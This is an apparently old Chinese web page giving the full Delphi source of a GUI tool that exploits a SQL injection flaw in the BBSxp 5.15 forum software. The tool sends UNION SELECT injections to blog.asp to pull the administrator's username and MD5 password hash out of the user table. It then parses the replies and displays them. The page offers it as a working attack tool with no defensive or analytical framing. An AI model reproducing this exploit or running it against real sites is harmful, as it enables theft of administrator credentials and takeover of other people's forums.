上一篇:DVBBS上传ASP文件漏洞详解 >>
“BBSxp 5.15”暴库工具源码
| unit unit1; interface uses windows, messages, sysutils, variants, classes, graphics, controls, forms, dialogs, idbasecomponent, idcomponent, idtcpconnection, idtcpclient, idhttp, stdctrls, idantifreezebase, idantifreeze, winhttp, comctrls, extctrls, winskindata; type tform1 = class(tform) edit1: tedit; edit2: tedit; edit3: tedit; button1: tbutton; idhttp1: tidhttp; winhttp1: twinhttp; label1: tlabel; label2: tlabel; label3: tlabel; bevel1: tbevel; button2: tbutton; statusbar1: tstatusbar; procedure button1click(sender: tobject); procedure winhttp1done(sender: tobject; const contenttype: string; filesize: integer; stream: tstream); procedure winhttp1httperror(sender: tobject; errorcode: integer; stream: tstream); procedure button2click(sender: tobject); procedure edit3change(sender: tobject); private { private declarations } public { public declarations } end; var form1: tform1; implementation {$r *.dfm} procedure tform1.button1click(sender: tobject); var s1:string; url1,url2:string; i:integer; begin if edit1.text ='' then begin showmessage(' 请输入网址先!'); exit; end; url1:=edit1.text+'blog.asp?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5'; url2:=edit1.text+'blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5'; //---------------------------暴账号(idhttp)----------------------- try form1.caption :='正在暴取账号......'; s1:=idhttp1.get(url1); if pos('username',s1)<>0 then begin i:=pos('username',s1); s1:=copy(s1,i+9,15); //账号位数不固定,但最长不得超过12位 i:=pos('">',s1); s1:=copy(s1,1,i-1); //取得账号 edit2.text :=s1; idhttp1.disconnect ; //断开连接 end else begin form1.caption :='[bbsxp 5.15]暴库工具 '; showmessage('暴库失败!可能不存在此漏洞!'); idhttp1.disconnect ; //断开连接 exit; end; except form1.caption :='[bbsxp 5.15]暴库工具 '; showmessage('网络超时或其他错误!'); idhttp1.disconnect ; exit; //如果错误就退出 ,不继续下面的代码 end; //----------暴账号完毕------------- //----如果暴账号成功,那暴密码肯定也成功,则继续下面的代码 //-----------------------------暴密码(winhttp)------------------------ form1.caption :='正在暴取密码......'; winhttp1.url :=url2; winhttp1.read; //-----接 winhttp1done 和 winhttp1httperror---------- end; //-------winhttp1done 和 winhttp1httperror 的代码要一致,因为暴密码一般都是在error状态下---- procedure tform1.winhttp1done(sender: tobject; const contenttype: string; filesize: integer; stream: tstream); var s2:string; i:integer; begin with stream as tmemorystream do begin setlength(s2,size); stream.read(s2[1],size); end; if pos('username',s2)<>0 then begin i:=pos('username',s2); s2:=copy(s2,i+9,32); //这里为固定的32位md5加密,可以直接取32个字符即得密码 edit3.text :=s2; end; end; procedure tform1.winhttp1httperror(sender: tobject; errorcode: integer; stream: tstream); var s2:string; i:integer; begin with stream as tmemorystream do begin setlength(s2,size); stream.read(s2[1],size); end; if pos('username',s2)<>0 then begin i:=pos('username',s2); s2:=copy(s2,i+9,32); //这里为固定的32位md5加密,可以直接取32个字符即得密码 edit3.text :=s2; end; end; procedure tform1.button2click(sender: tobject); begin close; end; procedure tform1.edit3change(sender: tobject); begin form1.caption :='[bbsxp 5.15]暴库工具 '; end; end. 下一篇:你所不注意的QQ技巧 >> 相关文章:
© 2006 www.java-asp.net
|